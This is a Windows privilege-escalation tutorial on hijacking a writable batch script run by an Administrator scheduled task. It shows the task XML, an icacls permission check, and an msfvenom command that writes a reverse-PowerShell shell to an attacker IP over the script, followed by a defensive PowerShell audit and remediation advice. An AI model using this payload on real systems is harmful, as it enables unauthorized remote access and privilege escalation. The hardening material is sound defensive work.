Hijacks

Hijacking in Windows refers to replacing or modifying an executable file, library, or script that a trusted process or scheduled mechanism automatically loads. When the file is writable by a lower-privileged user, it can be overwritten with malicious code. Upon execution by the privileged process or task, the attacker’s code runs in the same security context, often leading to privilege escalation or persistence. This technique applies to multiple file types: service binaries (.exe), dynamic-link libraries (.dll), and executable scripts such as batch files (.bat, .cmd) or PowerShell scripts (.ps1). The underlying principle remains the same—leveraging weak file permissions to replace a trusted component that Windows or applications expect to execute.

Batch Script Hijack

A batch file (.bat or .cmd) is a plain-text script that executes a sequence of Windows commands. It is used to automate tasks such as file management, program execution, or system configuration. Because batch files run in the context of the invoking user or process, they can be abused for persistence, privilege escalation, or post-exploitation if a writable file is executed by a privileged service or scheduled task.

# List the file's contents
> type c:\tasks\my_job
<SNIP>

<Interval>PT1M</Interval> # Runs every minute
<Exec>
<Command>C:\Windows\System32\cmd.exe</Command>
<Arguments>/c C:\Windows\Logs\my_task.bat</Arguments> # Executes this file
</Exec>
<Principals>
<UserId>Administrator</UserId> # Runs as Administrator

<SNIP>

# Check the batch file's permissions
> icacls c:\windows\logs\my_task.bat
c:\windows\logs\my_task.bat Everyone:(RX,W) # File is writable
# Create a reverse shell payload
msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.49.117 LPORT=80 > my_task.bat
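The walkthrough above finds the weakness by hand: read the task definition, spot an elevated principal, then check the ACL of the script it runs. The following PowerShell audit does the same check across every registered task so an administrator can find writable task scripts before anyone else does. It is an added example, not code from the original page; the list of low-privileged identities, the regex used to pull file paths out of task arguments, and the heuristic for "elevated" principals are assumptions, and it should be run from an elevated prompt so that tasks owned by other accounts are visible.

```powershell
# Added audit example (not from the original page): list scheduled tasks that run as an
# elevated principal and execute a script or binary that a low-privileged group may modify.
# Identity names, the path regex and the "elevated" heuristic below are assumptions.

$lowPrivIdentities = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Any of these rights lets the holder replace or alter the file's contents.
$writeMask = [System.Security.AccessControl.FileSystemRights]`
    'Write, Modify, FullControl, WriteData, AppendData, TakeOwnership, ChangePermissions'

function Get-ReferencedFiles {
    param([string]$Execute, [string]$Arguments)
    # Pull every absolute path ending in a script/binary extension out of the command line.
    # Assumption: paths contain no spaces (cmd.exe /c C:\Windows\Logs\my_task.bat style).
    $text = "$Execute $Arguments"
    [regex]::Matches($text, '(?i)[a-z]:\\[^\s"<>|]+\.(bat|cmd|ps1|exe|dll|vbs)') |
        ForEach-Object { $_.Value } |
        Sort-Object -Unique
}

function Test-LowPrivWritable {
    param([string]$Path)
    # Returns a description of the first Allow ACE that grants write-type rights to a
    # low-privileged identity, or $null when the file is absent or not writable by them.
    if (-not (Test-Path -LiteralPath $Path)) { return $null }
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPrivIdentities -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $writeMask) -ne 0) {
            return "$($ace.IdentityReference.Value): $($ace.FileSystemRights)"
        }
    }
    return $null
}

$findings = foreach ($task in Get-ScheduledTask) {
    $p = $task.Principal
    # Heuristic: treat RunLevel=Highest or a well-known privileged account as elevated.
    $elevated = ($p.RunLevel -eq 'Highest') -or
                ($p.UserId -match '^(SYSTEM|S-1-5-18|Administrator)$') -or
                ($p.UserId -match '^NT AUTHORITY\\')
    if (-not $elevated) { continue }

    foreach ($action in $task.Actions) {
        # Only Exec actions carry an Execute property; COM handler actions are skipped.
        if (-not $action.Execute) { continue }
        foreach ($file in Get-ReferencedFiles $action.Execute $action.Arguments) {
            $hit = Test-LowPrivWritable $file
            if ($hit) {
                [pscustomobject]@{
                    Task       = "$($task.TaskPath)$($task.TaskName)"
                    RunsAs     = $p.UserId
                    RunLevel   = $p.RunLevel
                    File       = $file
                    WritableBy = $hit
                }
            }
        }
    }
}

$findings | Format-Table -AutoSize
```

For the task shown above, the audit would report `C:\Windows\Logs\my_task.bat` as writable by `Everyone`. The fix is to remove the non-administrative write grant (for example `icacls C:\Windows\Logs\my_task.bat /remove Everyone` followed by an explicit read-only grant if that group still needs to read it) and to keep scripts run by privileged tasks in directories that only administrators can modify. For ongoing detection, enable object-access auditing on those script paths (Security event 4663) or collect Sysmon file-creation events (Event ID 11) for them, and alert on any write that does not come from an approved change process.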
